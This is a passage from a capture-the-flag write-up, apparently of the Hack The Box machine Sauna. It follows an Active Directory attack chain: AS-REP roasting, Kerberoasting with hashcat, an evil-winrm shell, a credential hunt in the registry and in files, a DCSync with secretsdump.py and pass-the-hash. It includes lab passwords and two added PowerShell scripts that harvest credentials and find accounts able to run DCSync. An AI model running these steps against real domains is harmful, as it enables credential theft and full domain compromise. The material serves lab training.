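Get-Content users.txt | Measure-Object | Select-Object -ExpandProperty Count
```

Sort-Object -Unique matters here: two people sharing a surname collapse to the same "smith" candidate, and a spray tool that counts attempts per account will otherwise double-hit it.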

Foothold

The initial attempt shows we are using the wrong domain, to the glee of a friend who is getting into the habit of saying stop being stooopid.

Interestingly it looks like fsmith is a valid user whose account does not require Kerberos pre-authentication, so GetNPUsers.py hands us an AS-REP hash for the account without any password. Bouncing back to the blogs we move along the chain to crack it. Using hashcat we run:

hashcat -m 18200 --force -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt

With that we have the password. Running GetUserSPNs.py with the new account shows one SPN:

ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 00:54:34.140321  <never>               

HSmith is showing instead of fsmith, interestingly. I need to read up more on SPNs, though it probably won't be needed for this box. Microsoft has some good documentation here: https://docs.microsoft.com/en-us/windows/win32/ad/service-principal-names

A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.

It looks like hsmith will be the service account we target. Initially we were getting an error when trying to run this command, “[-] SPN: – Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)”, but running ntpdate 10.10.10.175 to sync our clock with the DC fixed it (Kerberos rejects requests when the client clock is more than 5 minutes out). Running the command above again we get the hash, and now we just need to... ah, roast it.

We crack it successfully, but the password is Thestrokes23, the same as fsmith's; maybe this was a false positive. Let's log in.

Looks like we can SMB login as both hsmith and fsmith.

We see a RICOH printer driver, which is interesting, but there don't seem to be any vulnerabilities we can use. Going back over the nmap results we see WinRM running on its default port, so let's try evil-winrm to get a shell with these users. We use this guide to set up evil-winrm: https://github.com/Hackplayers/evil-winrm

Bingo! We have access as fsmith, but we can't access WinRM as hsmith. So let's try some enumeration to get root; BloodHound might be good here. Using ired.team's tutorial we set up BloodHound: https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux

While this is being set up we enumerate some more.

We can see a svc account is available; we will try to Kerberoast it.

Doesn't work, so let's enumerate some more:

Some good information. We also run these commands from C:\

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

We get a lot of results but nothing seems relevant. After a while we find a blog with additional enumeration steps: https://pentestlab.blog/2017/04/19/stored-credentials/ Checking the Winlogon autologon registry key it describes gives us:

I am not associated with https://pentestlab.blog/ but I owe her so many beers by now.

DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
DefaultPassword    REG_SZ    Moneymakestheworldgoround!
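Added example, my own and not from the write-up or the linked blog: the two stored-credential checks used above (findstr across config files, and the Winlogon autologon values) as one script, so the registry hit is not missed while wading through findstr output. Function names and the search roots are my own choices.

```powershell
# Added example: stored-credential hunting on a Windows host.
function Get-AutoLogonCredential {
    # Autologon keeps the account under Winlogon in clear text. DefaultPassword is
    # present only when it was set directly in the registry; when it was set with
    # the Autologon tool the password lives in an LSA secret instead (SYSTEM needed).
    $winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $p = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
    if (-not $p) { return }
    [pscustomobject]@{
        AutoAdminLogon = $p.AutoAdminLogon
        Domain         = $p.DefaultDomainName
        UserName       = $p.DefaultUserName
        Password       = $p.DefaultPassword      # $null when held as an LSA secret
    }
}

function Find-PasswordStrings {
    param(
        [string]   $Root = 'C:\',
        [string[]] $Extensions = @('*.txt', '*.xml', '*.ini', '*.config', '*.ps1', '*.bat')
    )
    # Same idea as findstr /si password, but reports file and line together and
    # skips the noise under the Windows directory.
    Get-ChildItem -Path $Root -Recurse -Include $Extensions -File -ErrorAction SilentlyContinue |
        Where-Object { $_.FullName -notlike 'C:\Windows\*' } |
        Select-String -Pattern 'password' -SimpleMatch |
        Select-Object Path, LineNumber, Line
}

Get-AutoLogonCredential | Format-List
Find-PasswordStrings -Root 'C:\Users' | Format-Table -AutoSize
```

Run the registry check first: it is one key read and, as on this box, frequently the whole answer; the file sweep is the slow, noisy fallback.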

We now have User 1 and User 2, but how do we get root? Let's go over our enumeration with impacket and these new user credentials.

We have a ticket-granting ticket. Let's Kerberoast the service account in case we get something new. But we don't.

Sadly this isn't helping us. So let's go back to enumeration; we have a domain account, so let's use BloodHound to enumerate all things AD.

Going through the information generated we see unconstrained delegation is enabled, allowing for this attack: https://blog.stealthbits.com/unconstrained-delegation-permissions/ This might help us. Unfortunately it doesn't: the host with it is the domain controller itself, which always has unconstrained delegation, so on its own that gives us nothing.

But the information from just fsmith's account is limited, so let's log in as svc_loanmgr and see what information we get.

After spending some time navigating BloodHound (as nice as having a GUI is for the point-and-click admins, I hate it), after much searching, blood, sweat and sanity I finally see that svc_loanmgr has both GetChanges and GetChangesAll on the domain object, which together allow a DCSync attack.
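Added example, my own rather than the write-up's: the same finding checked directly from the domain object's ACL, which is quicker than hunting for the edge in the BloodHound GUI and confirms exactly which extended rights a principal holds. It assumes the ActiveDirectory module (RSAT) is available so the AD: drive exists; the function name is mine.

```powershell
# Added example: list every principal holding replication rights on the domain
# object, and flag the ones holding the pair that DCSync (secretsdump.py) needs.
Import-Module ActiveDirectory

# Extended-right GUIDs for the replication permissions.
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DcSyncCapable {
    param([string] $DomainDN = (Get-ADDomain).DistinguishedName)

    $acl = Get-Acl -Path "AD:\$DomainDN"
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and $replRights.ContainsKey($_.ObjectType.ToString()) } |
        Group-Object IdentityReference |
        ForEach-Object {
            $held = $_.Group | ForEach-Object { $replRights[$_.ObjectType.ToString()] } | Sort-Object -Unique
            [pscustomobject]@{
                Identity  = $_.Name
                Rights    = $held -join ', '
                # Get-Changes plus Get-Changes-All is the combination that lets a
                # principal pull password hashes through the replication protocol.
                CanDcSync = ($held -contains 'DS-Replication-Get-Changes') -and
                            ($held -contains 'DS-Replication-Get-Changes-All')
            }
        }
}

Get-DcSyncCapable | Sort-Object CanDcSync -Descending | Format-Table -AutoSize
```

On a healthy domain the CanDcSync = True rows are Domain Controllers, Enterprise Domain Controllers, Domain Admins and Administrators; any other identity in that set is the finding, which on this box is svc_loanmgr. The same ACL read is what a defender should alert on, since granting these rights is rare and almost always deliberate.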

We attack it using the impacket tool secretsdump.py, described in the blog https://spookysec.net/2019-12-01-domain-controller-sync/ (sent our way by a friend who stops us being stoopid).

From here we just need to pass the Administrator NTLM hash to evil-winrm to get the flag.

Game, set and match. That said, I was working on this on and off for about 4 days before it clicked; strangely it was seeing the vulnerability in BloodHound that I had the most trouble with, which if you go by the comments in the HTB forums was the easy bit! 😀

Such is life.